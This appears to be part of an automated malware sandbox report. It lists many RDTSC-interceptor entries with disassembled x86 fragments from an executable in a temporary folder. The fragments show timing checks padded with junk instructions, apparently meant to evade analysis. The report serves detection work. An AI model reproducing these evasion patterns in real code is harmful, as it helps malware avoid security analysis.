Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1E18 second address: 6D1E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1E1C second address: 6D1E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1E20 second address: 6D1EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD3A4D6CBA2h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FD3A4D6CB98h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub edi, 1FE56A76h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c or di, 90FFh 0x00000041 mov dword ptr [ebp+122D342Ch], ebx 0x00000047 mov eax, dword ptr [ebp+122D0D39h] 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FD3A4D6CB98h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+122D2E20h], edx 0x0000006f nop 0x00000070 jnc 00007FD3A4D6CBB6h 0x00000076 push eax 0x00000077 js 00007FD3A4D6CBA2h 0x0000007d jo 00007FD3A4D6CB9Ch 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D6D7F second address: 6D6D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6745D5 second address: 6745EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD3A4D6CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3A4D6CB9Bh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6745EC second address: 67460A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE98h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67460A second address: 67461D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67461D second address: 674629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E34DE second address: 6E3512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD3A4D6CBA4h 0x0000000e jmp 00007FD3A4D6CBA7h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E391D second address: 6E3950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD3A47FEE91h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD3A47FEE96h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E3950 second address: 6E3956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBD4F second address: 6EBDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FD3A47FEE92h 0x0000000d js 00007FD3A47FEE8Ch 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 js 00007FD3A47FEE9Ch 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007FD3A47FEE94h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBFC0 second address: 6EBFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FD3A4D6CBA4h 0x00000010 jmp 00007FD3A4D6CB9Bh 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A4D6CB9Fh 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBFFE second address: 6EC008 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3A47FEE8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 685260 second address: 685266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 685266 second address: 68527D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0008 second address: 6F000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F000C second address: 6F0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0012 second address: 6F0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FD3A4D6CB96h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A4D6CBA6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0036 second address: 6F0058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F064C second address: 6F0650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0650 second address: 6F0656 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0656 second address: 6F0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0664 second address: 6F066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F07DC second address: 6F080A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A4D6CBA0h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F080A second address: 6F080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F099A second address: 6F099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F099E second address: 6F09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0C2C second address: 6F0C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FD3A4D6CB98h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0DD3 second address: 6F0DEA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FD3A47FEE8Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0DEA second address: 6F0E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FD3A4D6CB9Dh 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007FD3A4D6CB9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FD3A4D6CB96h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0E18 second address: 6F0E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F86 second address: 6F0F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F8A second address: 6F0F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F90 second address: 6F0F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F96 second address: 6F0FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3A47FEE8Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F112B second address: 6F116F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD3A4D6CBA2h 0x0000000d jnl 00007FD3A4D6CB96h 0x00000013 jbe 00007FD3A4D6CB96h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FD3A4D6CBA4h 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F116F second address: 6F1173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12A9 second address: 6F12BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12BB second address: 6F12C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12C5 second address: 6F12C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12C9 second address: 6F12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12CF second address: 6F12E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12E9 second address: 6F12EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12EF second address: 6F12F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12F3 second address: 6F130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FD3A47FEE88h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4967 second address: 6F4972 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4972 second address: 6F4978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BC2 second address: 6C9BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BC6 second address: 6C9BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A47FEE95h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BE7 second address: 6C9BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9DB1 second address: 6C9DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E73 second address: 6C9E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E97 second address: 6C9E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E9B second address: 6C9EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jo 00007FD3A4D6CBA4h 0x00000019 pushad 0x0000001a ja 00007FD3A4D6CB96h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA038 second address: 6CA03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA03C second address: 6CA046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA046 second address: 6CA095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c jno 00007FD3A47FEE88h 0x00000012 pop ecx 0x00000013 nop 0x00000014 jl 00007FD3A47FEE8Ch 0x0000001a mov dword ptr [ebp+122D331Bh], ecx 0x00000020 mov dword ptr [ebp+12457DF3h], ecx 0x00000026 push 00000004h 0x00000028 jo 00007FD3A47FEE8Ch 0x0000002e mov dword ptr [ebp+1248E3DCh], edi 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jng 00007FD3A47FEE88h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA45E second address: 6CA479 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A4D6CB98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD3A4D6CB9Ch 0x00000015 jns 00007FD3A4D6CB96h 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA88D second address: 6CA893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DB9 second address: 6F4DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DBD second address: 6F4DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DC8 second address: 6F4DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD3A4D6CBA7h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DEA second address: 6F4DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DF0 second address: 6F4DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DF4 second address: 6F4DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5086 second address: 6F50A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD3A4D6CBA1h 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50A1 second address: 6F50A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50A5 second address: 6F50C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FD3A4D6CBA0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50C2 second address: 6F50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3A47FEE86h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5614 second address: 6F5618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5618 second address: 6F5623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAC0F second address: 6FAC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD3A4D6CB96h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007FD3A4D6CB9Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAED4 second address: 6FAEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAEDB second address: 6FAEE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD3A4D6CBA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAEE5 second address: 6FAEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1B3 second address: 6FB1BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1BA second address: 6FB1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1C4 second address: 6FB1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB31D second address: 6FB323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
